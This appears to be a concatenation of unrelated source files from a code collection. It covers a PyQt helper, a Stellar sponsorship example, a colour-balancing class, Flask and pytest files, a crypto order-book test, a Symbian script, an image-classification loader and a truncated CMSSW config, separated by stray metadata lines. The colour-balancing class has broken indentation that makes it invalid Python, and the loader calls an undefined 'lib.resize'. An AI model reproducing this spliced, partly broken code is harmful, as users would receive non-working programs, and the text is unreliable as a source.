# KIND, either express or implied. See the Apache License for the specific
# language governing permissions and limitations under the Apache License.
import re
def to_methods(function_str):
    """
    to_methods is a helper function that aims to replace all the "toX" methods
    from PyQt4-apiV1.0.

    It strips the first ``.toString()/.toInt()/.toFloat()/.toBool()/
    .toPyObject()/.toAscii()`` call, returning the receiver expression joined
    with whatever followed the call; strings without such a call are
    returned unchanged.

    :param function_str: String that represents something that may have the
        toX methods in it.
    :type function_str: str
    :return: A string that, if a method was found, has been cleaned.
    :rtype: str
    """
    conversions = ("String", "Int", "Float", "Bool", "PyObject", "Ascii")
    pattern = (
        r"(?P<object>.*?)"        # receiver expression (non-greedy)
        r"\.to(?:%s)"             # one of the apiV1 conversion names
        r"\(.*?\)"                # the (non-greedy) argument list
        r"(?P<end>.*)"            # anything after the call
    ) % "|".join(conversions)
    match = re.match(pattern, function_str, re.MULTILINE)
    if match is None:
        return function_str
    groups = match.groupdict()
    return groups["object"] + groups["end"]
from stellar_sdk import Server, TransactionBuilder, Keypair, Network

# Example: sponsored reserves (CAP-0033) on the Stellar testnet.
# NOTE: "<KEY>" are placeholder secret seeds; never commit real secrets.
sponsor_secret = "<KEY>"
new_account_secret = "<KEY>"

sponsor_keypair = Keypair.from_secret(sponsor_secret)
newly_created_keypair = Keypair.from_secret(new_account_secret)

server = Server("https://horizon-testnet.stellar.org")
network_passphrase = Network.TESTNET_NETWORK_PASSPHRASE

# Sponsoring Account Creation
# https://github.com/stellar/stellar-protocol/blob/master/core/cap-0033.md#example-sponsoring-account-creation
# The create-account op is sandwiched between begin/end sponsoring ops so the
# sponsor pays the new account's base reserve.
sponsor_account = server.load_account(sponsor_keypair.public_key)
sponsoring_account_creation_te = TransactionBuilder(
    source_account=sponsor_account,
    network_passphrase=network_passphrase
).append_begin_sponsoring_future_reserves_op(
    sponsored_id=newly_created_keypair.public_key,
    source=sponsor_keypair.public_key
).append_create_account_op(
    destination=newly_created_keypair.public_key,
    starting_balance="10",
    source=sponsor_keypair.public_key
).append_end_sponsoring_future_reserves_op(
    source=newly_created_keypair.public_key
).build()
# Both the sponsor and the sponsored account must sign.
sponsoring_account_creation_te.sign(sponsor_keypair)
sponsoring_account_creation_te.sign(new_account_secret)
sponsoring_account_creation_resp = server.submit_transaction(sponsoring_account_creation_te)
print(sponsoring_account_creation_resp)

# Revoke Account Sponsorship (only the sponsor needs to sign).
sponsor_account = server.load_account(sponsor_keypair.public_key)
revoke_account_sponsorship_te = TransactionBuilder(
    source_account=sponsor_account,
    network_passphrase=network_passphrase
).append_revoke_account_sponsorship_op(
    account_id=newly_created_keypair.public_key,
    source=sponsor_keypair.public_key
).build()
revoke_account_sponsorship_te.sign(sponsor_keypair)
revoke_account_sponsorship_resp = server.submit_transaction(revoke_account_sponsorship_te)
print(revoke_account_sponsorship_resp)
""" File:
cbimg.py
Implements color balancing algorithms.
"""
import numpy as np
from scipy.stats.mstats import mquantiles
import concurrent.futures
class CBImg:
"""
Implemented Public Methods:
- grayWorld
- simplestColorBalance
- robustAWB
Every public method expects an RGB image and returns an RGB image.
"""
    # Linear sRGB -> CIE XYZ conversion matrix (D65 reference white).
    __sRGBtoXYZ = np.array([[0.4124564, 0.3575761, 0.1804375],
                            [0.2126729, 0.7151522, 0.0721750],
                            [0.0193339, 0.1191920, 0.9503041]])

    def __init__(self):
        # Stateless: all work happens in the public balancing methods.
        pass
def __cb_reshape(self, img):
"""
Takes an M x N x 3 RGB image and returns a 3 x (M*N) matrix,
where each column is a RGB pixel.
"""
return np.transpose(img, (2, 0, 1)).reshape((3, np.size(img)//3))
def __cb_unshape(self, matrix, height, width):
"""
Takes a 3 x (M*N) matrix and returns a RGB M x N x 3 matrix.
"""
return np.transpose(matrix.reshape((3, height, width)), (1, 2, 0))
def __XYZ_to_xy(self, xyz):
"""
Converts CIE XYZ to xy chromaticity.
"""
X = xyz[0:1][0]
Y = xyz[1:2][0]
s = np.array([sum(xyz)])
return np.array([X/s, Y/s])
def __xy_to_XYZ(self, xy, Y):
"""
Converts xyY chromaticity to CIE XYZ.
"""
x = xy[0]
y = xy[1]
return np.array([[(Y/y * x), Y, Y/y * (1 - x - y)]], dtype='float64')
def __make_col(self, x):
s = x.shape
if len(s) == 2 and s[0] < s[1]:
x = x.transpose()
return x
    def __cb_CAT(self, xyz_est, xyz_target, cat_type):
        """
        Chromatic Adaptation Transform.

        Builds the 3x3 RGB-space correction matrix that maps the estimated
        illuminant ``xyz_est`` onto ``xyz_target``, using the cone-response
        matrix selected by ``cat_type``.

        :raises ValueError: if ``cat_type`` is not a known transform name.
        """
        xyz_est = self.__make_col(xyz_est)
        xyz_target = self.__make_col(xyz_target)
        xfm = None
        if cat_type == "vonKries":
            xfm = np.array([[0.40024, 0.7076, -0.08081],
                            [-0.2263, 1.16532, 0.0457],
                            [ 0.0, 0.0, 0.91822]])
        elif cat_type == "bradford":
            xfm = np.array([[ 0.8951, 0.2664, -0.1614],
                            [-0.7502, 1.7135, 0.0367],
                            [ 0.0389, -0.0685, 1.0296]])
        elif cat_type == "sharp":
            xfm = np.array([[ 1.2694, -0.0988, -0.1706],
                            [-0.8364, 1.8006, 0.0357],
                            [ 0.0297, -0.0315, 1.0018]])
        elif cat_type == "cmccat2000":
            xfm = np.array([[ 0.7982, 0.3389, -0.1371],
                            [-0.5918, 1.5512, 0.0406],
                            [ 0.0008, 0.239, 0.9753]])
        elif cat_type == "cat02":
            xfm = np.array([[ 0.7328, 0.4296, -0.1624],
                            [-0.7036, 1.6975, 0.0061],
                            [ 0.0030, 0.0136, 0.9834]])
        else:
            raise ValueError("invalid type for cat_type")

        ### xfm^(-1) * diagflat(gain) * xfm
        # Per-channel gains in the cone-response domain.
        gain = np.dot(xfm, xyz_target) / np.dot(xfm, xyz_est)
        # lstsq(xfm, M) computes xfm^(-1) @ M without forming the inverse.
        solution, _, _, _ = np.linalg.lstsq(xfm, np.diagflat(gain), rcond=None)
        solution = np.dot(solution, xfm)
        # ###
        # Map the correction from XYZ back into (linear) sRGB space:
        # sRGBtoXYZ^(-1) @ solution @ sRGBtoXYZ.
        retsolution, _, _, _ = np.linalg.lstsq(self.__sRGBtoXYZ, solution, rcond=None)
        return np.dot(retsolution, self.__sRGBtoXYZ)
#############################################
#############################################
#############################################
# Public Methods #
#############################################
    def grayWorld(self, img, *, cat_type="vonKries", max_iter=1):
        """!
        Color balancing using the Gray World assumption and Chromatic Adaptation
        Transform (CAT).

        \param img RGB image
        \param cat_type string with the CAT type.
                        Exactly one of:
                         * vonKries
                         * bradford
                         * sharp
                         * cmccat2000
                         * cat02
        \param max_iter maximum number of iterations
        \return The image @c img with its colors balanced
        """
        assert type(img) is np.ndarray, 'img is not numpy.ndarray'
        assert len(img.shape) == 3 and img.shape[2] == 3, 'img must be in RGB color scheme'

        img_rgb = img/255
        height, width, _ = img.shape
        xyz_D65 = np.array([[95.04], [100.], [108.88]])
        b = .001  # convergence limit
        img_orig = self.__cb_reshape(img_rgb) * 255

        graydiff = []
        for i in range(max_iter):
            # Gray World estimate: mean RGB of the whole image.
            rgb_est = np.array([np.mean(img_orig, axis=1)])
            rgb_est = rgb_est.transpose()
            # How far the mean is from being achromatic (R == G == B).
            graydiff.append(np.linalg.norm(np.array([rgb_est[0] - rgb_est[1],
                                                     rgb_est[0] - rgb_est[2],
                                                     rgb_est[1] - rgb_est[2]])))
            if graydiff[-1] < b:  # Convergence
                break
            elif i >= 1 and abs(graydiff[-2] - graydiff[-1]) < 10e-6:
                # Stalled: successive iterations no longer improve.
                break

            xy_est = self.__XYZ_to_xy(np.dot(self.__sRGBtoXYZ, rgb_est))
            xyz_est = self.__xy_to_XYZ(xy_est, 100)  # normalize Y to 100 for D-65 luminance comparable
            # Correct toward the D65 white point via CAT.
            img_rgb = np.dot(self.__cb_CAT(xyz_est, xyz_D65, cat_type), img_orig)

        out = self.__cb_unshape(img_rgb, height, width)
        np.clip(out, 0, 255, out=out)
        return np.uint8(out)
    def simplestColorBalance(self, img, *, sat_level=0.01):
        """!
        Color balancing through histogram normalization.

        Each channel is clipped at its low/high quantiles and then stretched
        to the full [0, 255] range.

        \param img RGB image
        \param sat_level controls the percentage of pixels clipped to
                         black and white
        \return the image with its colors balanced
        """
        assert type(img) is np.ndarray, 'img is not numpy.ndarray'
        assert len(img.shape) == 3 and img.shape[2] == 3, 'img must be in RGB color scheme'

        height, width, _ = img.shape
        # Symmetric quantiles: half the saturation budget on each tail.
        q = np.array([sat_level/2.0, 1 - sat_level/2.0])

        img_orig = self.__cb_reshape(img/255) * 255
        img_rgb = np.zeros(img_orig.shape)

        def __closure(c):
            # Per-channel worker (each thread writes a disjoint row c).
            low, high = mquantiles(img_orig[c], q, alphap=0.5, betap=0.5)
            # Saturate appropriate points in distribution
            img_rgb[c] = np.where(img_orig[c] < low, low,
                                  (np.where(img_orig[c] > high, high, img_orig[c])))
            # Stretch the clipped channel to the full 0..255 range.
            bottom = np.amin(img_rgb[c])
            top = np.amax(img_rgb[c])
            d = top - bottom
            img_rgb[c] = (img_rgb[c] - bottom) * 255 / (d if d != 0 else 1)

        # NOTE(review): the futures returned by submit() are never checked,
        # so exceptions inside __closure would be silently dropped.
        with concurrent.futures.ThreadPoolExecutor(max_workers=3) as e:
            for c in [0, 1, 2]:
                e.submit(__closure, c)

        out = self.__cb_unshape(img_rgb, height, width)
        np.clip(out, 0, 255, out=out)
        return np.uint8(out)
def robustAWB(self, img, *, option="CAT", cat_type="vonKries", thresh=0.3, max_iter=1):
"""!
Color balancing through 'robust auto white' estimating gray pixels based
on its deviation from YUV space. Then applying a iterative correction by
using Chromatic Adaptation Transform or directly adjusting the channels
R and B.
\param img an RGB image
\param option the correction method (RBgain or CAT)
\param cat_type the CAT type used if the option argument is CAT
* vonKries
* bradford
* sharp
* cmccat2000
* cat02
\param thresh the deviation limit from gray to consider
\param max_iter the maximum number of iterations
\return the RGB image with its colors balanced
"""
assert type(img) is np.ndarray, 'img is not numpy.ndarray'
assert len(img.shape) == 3 and img.shape[2] == 3, 'img must be in RGB color scheme'
img_rgb = img/255
height, width, _ = img.shape
xyz_D65 = np.array([[95.04], [100.], [108.88]])
u = .01 # gain step
a = .8 # double step limit
b = .001 # convergence limit
# RGB to YUV
xfm = np.array([[ 0.299, 0.587, 0.114],
[-0.299, -0.587, 0.886],
[ 0.701, -0.587, -0.114]])
img_orig = self.__cb_reshape(img_rgb) * 255
img_rgb = img_orig.copy()
gain = np.array([1.0, 1.0, 1.0])
U_avg = []
V_avg = []
gray_total = np.array([])
for i in range(max_iter):
# to YUV
img = np.dot(xfm, img_rgb)
# Find gray chromaticity (|U|+|V|)/Y
with np.errstate(divide='ignore', invalid='ignore'):
F = np.array((abs(img[1]) + abs(img[2])) / img[0])#[0]
gray_total = np.append(gray_total, sum(F<thresh))
if gray_total[-1] == 0: # Valid gray pixels not found
break
grays = img[:, F<thresh]
U_bar = np.mean(grays[1])
V_bar = np.mean(grays[2])
U_avg.append(U_bar)
V_avg.append(V_bar)
if option == "CAT" and cat_type:
if max(abs(np.array([U_bar, V_bar]))) < b: # converged
break
elif i >= 2 and np.linalg.norm(np.array([U_avg[-1] - U_avg[-2], V_avg[-1] - V_avg[-2]])) < 10e-6:
break
# Convert gray average from YUV to RGB
rgb_est, _, _, _ = np.linalg.lstsq(xfm, np.array([[100.], [U_bar], [V_bar]]), rcond=None)
# xy chromaticity
xy_est = self.__XYZ_to_xy(np.dot(self.__sRGBtoXYZ, rgb_est))
# Normalize Y to 100 to be luminance D65 comparable
xyz_est = self.__xy_to_XYZ(xy_est, 100.)
img_rgb = np.dot(self.__cb_CAT(xyz_est, xyz_D65, cat_type), img_rgb)
elif option == "RBgain":
if abs(U_bar) > abs(V_bar): # U > V: blue needs adjust
err = U_bar
chnl = 2 # blue
else:
err = V_bar
chnl = 0 # red
if abs(err) >= a:
delta = 2 * np.sign(err) * u
elif abs(err) < b: # converged
delta = 0.
break
else:
delta = err * u
gain[chnl] = gain[chnl] - delta
img_rgb = np.dot(np.diag(gain), img_orig)
else:
if cat_type == None:
raise ValueError("cat_type must be provided")
else:
raise ValueError("invalid argument for 'option'")
out = self.__cb_unshape(img_rgb, height, width)
np.clip(out, 0, 255, out=out)
return np.uint8(out)
| 2.390625 | 2 |
tests/conftest.py | zzzeid/lando-ui | 8 | 12760970 | <reponame>zzzeid/lando-ui
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
import os
import binascii
import json
import pytest
import socket
from landoui.app import create_app
@pytest.fixture
def docker_env_vars(monkeypatch):
"""Monkeypatch environment variables that we'd get running under docker."""
monkeypatch.setenv("OIDC_DOMAIN", "test_oidc_domain")
monkeypatch.setenv("OIDC_CLIENT_ID", "test_oidc_client_id")
monkeypatch.setenv("OIDC_CLIENT_SECRET", "test_oidc_secret")
monkeypatch.setenv("DEBUG", "True")
monkeypatch.setenv("HOST", "0.0.0.0")
monkeypatch.setenv("PORT", "7777")
monkeypatch.setenv("LANDO_API_OIDC_IDENTIFIER", "lando-api-oidc-identifier")
monkeypatch.setenv("VERSION_PATH", "/version.json")
monkeypatch.setenv("SECRET_KEY", "secret_key_change_me")
monkeypatch.setenv("SESSION_COOKIE_NAME", "{}:7777".format(socket.gethostname()))
monkeypatch.setenv("SESSION_COOKIE_DOMAIN", "{}:7777".format(socket.gethostname()))
monkeypatch.setenv("SESSION_COOKIE_SECURE", "0")
monkeypatch.setenv("USE_HTTPS", "0")
monkeypatch.setenv("LANDO_API_URL", "http://lando-api.test:8888")
monkeypatch.setenv("SENTRY_DSN", "")
monkeypatch.setenv("LOG_LEVEL", "DEBUG")
@pytest.fixture
def api_url():
"""A string holding the Lando API base URL. Useful for request mocking."""
return "http://lando-api.test"
@pytest.fixture
def app(versionfile, docker_env_vars, api_url):
app = create_app(
version_path=versionfile.strpath,
secret_key=str(binascii.b2a_hex(os.urandom(15))),
session_cookie_name="lando-ui",
session_cookie_domain="lando-ui.test:7777",
session_cookie_secure=False,
use_https=0,
enable_asset_pipeline=False,
lando_api_url=api_url,
debug=True,
)
# Turn on the TESTING setting so that exceptions within the app bubble up
# to the test runner. Otherwise Flask will hide the exception behind a
# generic HTTP 500 response, and that makes writing and debugging tests
# much harder.
app.config["TESTING"] = True
return app
@pytest.fixture
def versionfile(tmpdir):
"""Provide a temporary version.json on disk."""
v = tmpdir.mkdir("app").join("version.json")
v.write(
json.dumps(
{
"source": "https://github.com/mozilla-conduit/lando-api",
"version": "0.0.0",
"commit": "",
"build": "test",
}
)
)
return v
| 1.914063 | 2 |
tests/cex_test.py | olned/ssc2ce-cpp | 0 | 12760971 | <reponame>olned/ssc2ce-cpp
# Copyright <NAME> 2020.
# Distributed under the Boost Software License, Version 1.0.
# See accompanying file LICENSE
# or copy at http://www.boost.org/LICENSE_1_0.txt
from unittest import TestCase, main
import ssc2ce_cpp as m
class TestCoinbaseParser(TestCase):
def setUp(self):
self.parser = m.CexParser()
self.top_prices = {}
self.top_bid = 0
self.top_ask = 0
self.book_setup_count = 0
self.parser.set_on_book_setup(self.handle_book_setup)
self.book_update_count = 0
self.parser.set_on_book_update(self.handle_book_update)
def handle_book_setup(self, book):
if book.instrument() in self.top_prices:
top = self.top_prices[book.instrument()]
top["bid"] = book.top_bid_price()
top["ask"] = book.top_ask_price()
else:
self.top_prices[book.instrument()] = dict(
bid=book.top_bid_price(),
ask=book.top_ask_price()
)
self.book_setup_count += 1
def handle_book_update(self, book):
top = self.top_prices[book.instrument()]
top["bid"] = book.top_bid_price()
top["ask"] = book.top_ask_price()
self.book_update_count += 1
def test_book(self):
book_snapshot = '{"e":"order-book-subscribe","data":{"timestamp":1592738201,"bids":[[8355.0,0.80000000],[8354.9,0.08562700],[8354.6,0.26770000]],"asks":[[8384.3,0.80000000],[8384.4,0.10000000],[8392.4,1.00000000]],"pair":"BTC:EUR","id":346101544,"sell_total":"176.22612139","buy_total":"1330266.42"},"oid":"book-1", "ok":"ok"}'
self.assertEqual(self.parser.parse(book_snapshot), True)
book = self.parser.get_book("BTC:EUR")
self.assertEqual(book.top_ask_price(), 8384.3)
self.assertEqual(book.top_bid_price(), 8355.0)
top = self.top_prices[book.instrument()]
self.assertEqual(top["ask"], 8384.3)
self.assertEqual(top["bid"], 8355.0)
self.assertEqual(self.book_setup_count, 1)
self.assertEqual(self.book_update_count, 0)
book_update = '{"e":"md_update","data":{"id":346101545,"pair":"BTC:EUR","time":1592738202189,"bids":[[8355.1,0.08562700],[8354.9,0.00000000]],"asks":[]}}'
self.assertEqual(self.parser.parse(book_update), True)
self.assertEqual(top["ask"], 8384.3)
self.assertEqual(top["bid"], 8355.1)
book_update = '{"e":"md_update","data":{"id":346101546,"pair":"BTC:EUR","time":1592738206257,"bids":[],"asks":[[8334.9,0.26770000],[8412.2,0.00000000]]}}'
self.assertEqual(self.parser.parse(book_update), True)
self.assertEqual(top["ask"], 8334.9)
self.assertEqual(top["bid"], 8355.1)
self.assertEqual(self.book_setup_count, 1)
self.assertEqual(self.book_update_count, 2)
if __name__ == '__main__':
main()
| 2.359375 | 2 |
web/public.py | mingziV5/NiuB | 0 | 12760972 | <reponame>mingziV5/NiuB<gh_stars>0
#coding:utf-8
from __future__ import unicode_literals
from flask import Flask, render_template, session, redirect, request
from . import app
import requests
import json
import utils
headers = {'Content-Type': 'application/json'}
data = {
'jsonrpc': '2.0',
'id': 1,
}
def get_api():
return 'http://%s/api' %app.config['api_url']
@app.route('/listapi')
def listapi():
headers['authorization'] = session['author']
method = request.args.get('method')
data['method'] = method + '.getlist'
where = request.args.get('where')
data['params'] = {}
if where == '1' and method == 'server':
data['params']['where'] = {'sg_id': request.args.get('sg_id')}
utils.write_log('web').info(data)
r = requests.post(get_api(), headers = headers, json = data)
utils.write_log('web').info(r.text)
return r.text
@app.route('/addapi', methods = ['GET', 'POST'])
def addapi():
headers['authorization'] = session['author']
form_data = dict((k, ','.join(v)) for k, v in dict(request.form).items())
method = form_data['method']
data['method'] = method + '.create'
form_data.pop('method')
data['params'] = form_data
utils.write_log('web').info(data)
r = requests.post(get_api(), headers = headers, json = data)
return r.text
@app.route('/getapi')
def getapi():
headers['authorization'] = session['author']
method = request.args.get('method')
data['method'] = method + '.get'
u_id = request.args.get('id')
data['params'] = {
'm_table': request.args.get('m_table', None),
'field': request.args.get('field', None),
's_table': request.args.get('s_table', None),
'where': {'id': int(u_id)}
}
print data
utils.write_log('web').info(data)
r = requests.post(get_api(), headers = headers, json = data)
return r.text
@app.route('/updateapi', methods=['GET', 'POST'])
def updateapi():
headers['authorization'] = session['author']
form_data = dict((k, ','.join(v)) for k, v in dict(request.form).items())
print form_data
method = form_data['method']
data['method'] = method + '.update'
form_data.pop('method')
data['params'] = {
'data': form_data,
'where': {
'id': int(form_data['id'])
}
}
print data
utils.write_log('web').info(data)
r = requests.post(get_api(), headers = headers, json = data)
return r.text
@app.route('/deleteapi')
def deleteapi():
headers['authorization'] = session['author']
method = request.args.get('method')
data['method'] = method + '.delete'
data['params'] = {
'where': {
'id': int(request.args.get('id'))
}
}
utils.write_log('web').info(data)
r = requests.post(get_api(), headers = headers, json = data)
return r.text
| 2.40625 | 2 |
Listboxapps_by2.py | gauravssnl/Symbian-Python-Files | 7 | 12760973 | <reponame>gauravssnl/Symbian-Python-Files
import e32,appuifw,os
from graphics import *
import geticon
import multimbm
import applist
limit=2
entries=[]
def listapps():
global entries,limit
lapp=applist.applist()
lapp1=[(el[1],el[0]) for el in lapp]
lmbm=[]
entries=[]
c=0
uidno=0xa89fd974
puz2=geticon.get(uidno,(50,50))
ipuz=Image.from_cfbsbitmap(puz2[0])
mpuz=Image.from_cfbsbitmap(puz2[1])
sd=0
for el in lapp1:
try:
i2=geticon.get(el[1],(50,50))
except:
print 'p: ',el
try:
i=Image.from_cfbsbitmap(i2[0])
imask=Image.from_cfbsbitmap(i2[1])
except:
print i2[0]
i=ipuz
imask=mpuz
lmbm.append(i)
lmbm.append(imask)
entries.append((el[0],unicode(hex(el[1])),appuifw.Icon(u'd:\\iapps.mbm', sd,sd+1)))
sd+=2
c+=1
if c>=limit: break
multimbm.create(u'd:\\iapps.mbm',lmbm)
app_lock = e32.Ao_lock()
def exit():
app_lock.signal()
def display():
global entries
listapps()
lb=appuifw.Listbox(entries,lambda:None)
appuifw.app.body=lb
def setlimit():
global limit
limit=appuifw.query(u'limit','number',1)
appuifw.app.menu=[(u'list apps',display),(u'set limit',setlimit)]
appuifw.app.exit_key_handler = exit
app_lock.wait()
| 2.34375 | 2 |
crowdsorting/app_resources/Strings_List.py | matthew-cheney/crowd-sorting-single-threaded | 1 | 12760974 | # This file will store strings for the entire app
# Error Strings
space_in_first_name_error = 'First name may not contain spaces'
space_in_last_name_error = 'Last name may not contain spaces'
# Dashboard Strings
my_projects = "My Projects"
no_projects = "Looks like you don't have any projects yet. Select Add project, or check back later."
add_project_button = "add project"
join_code_prompt = "Enter a join code:"
add_project_name_field = "project name"
add_project_join_field = "join code"
join_public_prompt = "Join a public project:"
select_project_prompt = "Select a project to work on"
# General Strings
submit_button = "submit"
join_button = "join"
select_button = "select"
leave_button = "leave" | 2.03125 | 2 |
bp_storage/classification.py | BrainPlugAI/bp-storage | 1 | 12760975 | <gh_stars>1-10
'''Data Loader for classification dataset.
author: <NAME>
'''
from random import randint
import numpy as np
import os, glob, math
import shutil
from . import utils
def _img_gen(folder):
imgs = utils.search_imgs(folder)
for img in imgs:
yield utils.imread(img)
def _find_classes(folder, only):
'''Retrieves the relevant classes from the '''
# generate data
folders = utils.only_folders(only)
# find all classes (iterate through all relevant folders)
rel_classes = []
for btype in folders:
# iterate through all possible dirs
for dir in folders[btype]:
# generate the folder name and check if exists
dir = os.path.join(folder, dir)
if not os.path.exists(dir):
continue
# iterate through all subdirs
_, dirs, _ = next(os.walk(dir))
for cls_dir in dirs:
cls_name = cls_dir.upper()
cls_dir = os.path.join(dir, cls_dir)
if not os.path.isdir(cls_dir):
continue
if cls_name not in rel_classes:
rel_classes.append(cls_name)
# return the generated classess
return rel_classes
def _gen_single(img, cls_name, classes, btype, one_hot=True, beard_format=False, show_btype=False):
'''Generate tuple for a single output.'''
if one_hot:
cls_name = np.eye(len(classes))[classes.index(cls_name)]
if beard_format:
if show_btype: return img, {}, [{utils.const.ITEM_CLASS: cls_name, utils.const.ITEM_BBOX: [0,0,0,0]}], btype
else: return img, {}, [{utils.const.ITEM_CLASS: cls_name, utils.const.ITEM_BBOX: [0,0,0,0]}]
else:
if show_btype: return img, cls_name, btype
else: return img, cls_name
def _gen_cls(folder, classes, shuffle=True, only=None, size=None, one_hot=True, beard_format=False, show_btype=False, resize=utils.ResizeMode.FIT, pad_color=(0,0,0), pad_mode=utils.PadMode.EDGE, debug=False):
'''Loads the images from the given folder.
Default output format is img, label, btype
Args:
folder (str): folder to load the data from
classes (list): list of classes (prefered upper case)
shuffle (bool): defines if the data should be shuffled (default: True)
only (DataType):
size (int):
one_hot (bool): defines if the classes should be given as one_hot vectors
beard_format (bool): defines if the generator should output in the same format as the beard & kitti generators
'''
# generate data
folders = utils.only_folders(only)
if classes is None:
raise ValueError("Expected list of classes, but got None!")
classes = [x.upper() for x in classes]
# iterate through folders
for btype in folders:
found = False
for dir in folders[btype]:
# check if folder exists
dir = os.path.join(folder, dir)
if not os.path.exists(dir):
continue
found = True
# check class folders
cls_gens = []
_, dirs, _ = next(os.walk(dir))
for cls_dir in dirs:
cls_name = cls_dir.upper()
cls_dir = os.path.join(dir, cls_dir)
if not os.path.isdir(cls_dir):
continue
if classes is None or cls_name in classes:
cls_gens.append((cls_name, _img_gen(cls_dir)))
# shuffle the classes
if not shuffle:
for cls_name, gen in cls_gens:
for img in gen:
img, _, _ = lib.resize(img, size, resize, pad_color, pad_mode)
yield _gen_single(img, cls_name, classes, btype, one_hot, beard_format, show_btype)
else:
while len(cls_gens) > 0:
id = randint(0, len(cls_gens) - 1)
try:
cls_name, gen = cls_gens[id]
img = next(gen)
img, _, _ = utils.resize(img, size, resize, pad_color, pad_mode)
yield _gen_single(img, cls_name, classes, btype, one_hot, beard_format, show_btype)
except StopIteration:
del cls_gens[id]
# debug output
if not found:
if debug: print("Could not find folder for type: {}".format(btype.name))
def load(folder, classes=None, only=None, size=None, one_hot=True, beard_format=False, show_btype=False, resize=utils.ResizeMode.FIT, pad_color=(0,0,0), pad_mode=utils.PadMode.EDGE, debug=False, shuffle=True):
'''Loads the classification data from file.
Returns:
folder (str): Folder that contains the classification structure
debug (bool): Defines if debugs messages should be shown
'''
# safty: check if the folder exists
if not os.path.exists(folder):
raise IOError("Specified folder ({}) does not exist!".format(folder))
# load the relevant classes
if classes is None:
classes = _find_classes(folder, only)
return classes, _gen_cls(folder, classes, shuffle, only, size, one_hot, beard_format, show_btype, resize, pad_color, pad_mode, debug)
def load_sample_imgs(folder, only, size=None, count=10, classes=None, resize=utils.ResizeMode.FIT, pad_color=(0,0,0), pad_mode=utils.PadMode.EDGE):
'''Loads relevant count of sample images'''
# safty: check if the folder exists
if not os.path.exists(folder):
raise IOError("Specified folder ({}) does not exist!".format(folder))
# load the relevant classes
if classes is None:
classes = _find_classes(folder, only)
gen = _gen_cls(folder, classes, True, only, size, True, False, False, resize, pad_color, pad_mode, False)
imgs = []
labels = []
for img, lbl in gen:
# check for end
if len(imgs) >= count: break
if np.random.randint(0, 10) > 5: continue
# add data
imgs.append(img)
labels.append(lbl)
# compress
imgs = np.stack(imgs, axis=0)
labels = np.stack(labels, axis=0)
return imgs, labels
def write(folder, debug=False):
raise NotImplementedError
| 2.5625 | 3 |
L1Trigger/GlobalTriggerAnalyzer/python/l1GtPatternGenerator_cfi.py | ckamtsikis/cmssw | 852 | 12760976 | <filename>L1Trigger/GlobalTriggerAnalyzer/python/l1GtPatternGenerator_cfi.py
import FWCore.ParameterSet.Config as cms
l1GtPatternGenerator = cms.EDAnalyzer("L1GtPatternGenerator",
# input tags for various records
GtInputTag = cms.InputTag("gtDigis"),
GmtInputTag = cms.InputTag("gmtDigis"),
GctInputTag = cms.InputTag("gctDigis"),
CscInputTag = cms.InputTag("gtDigis", "CSC"),
DtInputTag = cms.InputTag("gtDigis", "DT"),
RpcbInputTag = cms.InputTag("gtDigis", "RPCb"),
RpcfInputTag = cms.InputTag("gtDigis", "RPCf"),
# file name
PatternFileName = cms.string("GT_GMT_patterns.txt"),
# bunch crossing numbers to write
bx = cms.vint32(0),
# header
PatternFileHeader = cms.string(
"""#GT_GMT_patterns_VD
#
# editors - HB 220606
#
# remarks:
# values in this template are for version VD (same as VB) for the cond-chips of GTL9U (from IVAN)
#
# syntax:
# character "#" indicates a comment line
# header line 1 => hardware of sim- and spy-memories
# header line 2 => hardware location (FPGA-chip) of sim-memories
# header line 3 => channel number of sim-memories (PSB)
# header line 4 => hardware location (FPGA-chip) of spy-memories
# header line 5 => name of patterns
# header line 6 => number of objects (calos, muons) or other declarations
# (header line 7 => only graphics)
# (header line 8 => only text and graphics)
# header line 9 => number of columns, starting with 0
#
# patterns:
# values in column 0 are event numbers (decimal), starting with 0 (synchronisation data)
# patterns for 1024 events (memories of cond-chips on GTL9U can contain only 1024 events) are in this file
# values in columns 1-119 are the hexadecimal patterns, the rightmost digit in a string is LSB
#
# header:
# e |<--------------------------------------------------------------------------PSB/GTL9U(REC)------------------------------------------------------------------------------------------------------------->|<--------------------------------------------------------------------------PSB/GMT(AUF,AUB)--------------------------------------------------------------------------------------------------------------------------------------------------->|<----------------------------------------------------------------GMT REGIONAL MUONs----------------------------------------------------------->|<----GMT(SORT)/GTL9U(REC)----->|<--------------GTL9U(COND)/FDL(ALGO)---------------->|<-----------FDL----------->|
# v |PSB slot13/ch6+7 |PSB slot13/ch4+5 |PSB slot13/ch2+3 |PSB slot13/ch0+1 |PSB slot14/ch6+7 |PSB slot14/ch4+5 |PSB slot14/ch2+3 |PSB slot14/ch0+1 |PSB slot15/ch2+3 |PSB slot15/ch0+1 |PSB slot19/ch6+7 |PSB slot19/ch4+5 |PSB slot19/ch2+3 |PSB slot19/ch0+1 |PSB slot20/ch6+7 |PSB slot20/ch4+5 |PSB slot20/ch2+3 |PSB slot20/ch0+1 |PSB slot21/ch6+7 |PSB slot21/ch4+5 |PSB slot21/ch2+3 |PSB slot21/ch0+1 |GMT INF |GMT INC |GMT IND |GMT INB |GMT SORT |COND1 |COND2 |PSB slot9/ch0+1 |FINOR |
# e |ch6 ch7 ch6 ch7 |ch4 ch5 ch4 ch5 |ch2 ch3 ch2 ch3 |ch0 ch1 ch0 ch1 |ch6 ch7 ch6 ch7 |ch4 ch5 ch4 ch5 |ch2 ch3 ch2 ch3 |ch0 ch1 ch0 ch1 |ch2 ch3 ch2 ch3 |ch0 ch1 ch0 ch1 |ch6 ch7 ch6 ch7 |ch4 ch5 ch4 ch5 |ch2 ch3 ch2 ch3 |ch0 ch1 ch0 ch1 |ch6 ch7 ch6 ch7 |ch4 ch5 ch4 ch5 |ch2 ch3 ch2 ch3 |ch0 ch1 ch0 ch1 |ch6 ch7 ch6 ch7 |ch4 ch5 ch4 ch5 |ch2 ch3 ch2 ch3 |ch0 ch1 ch0 ch1 | | | | | | | |ch0 ch1 ch0 ch1 | |
# n |GTL9U REC1 |GTL9U REC1 |GTL9U REC2 |GTL9U REC2 |GTL9U REC2 |GTL9U REC2 |GTL9U REC3 |GTL9U REC3 |GTL9U REC3 |GTL9U REC3 |GMT AUF |GMT AUF |GMT AUB |GMT AUB |GMT AUF |GMT AUF |GMT AUB |GMT AUB |GMT AUF |GMT AUF |GMT AUB |GMT AUB | | | | |GTL9U REC1 |FDL ALGO |FDL ALGO |FDL ALGO | |
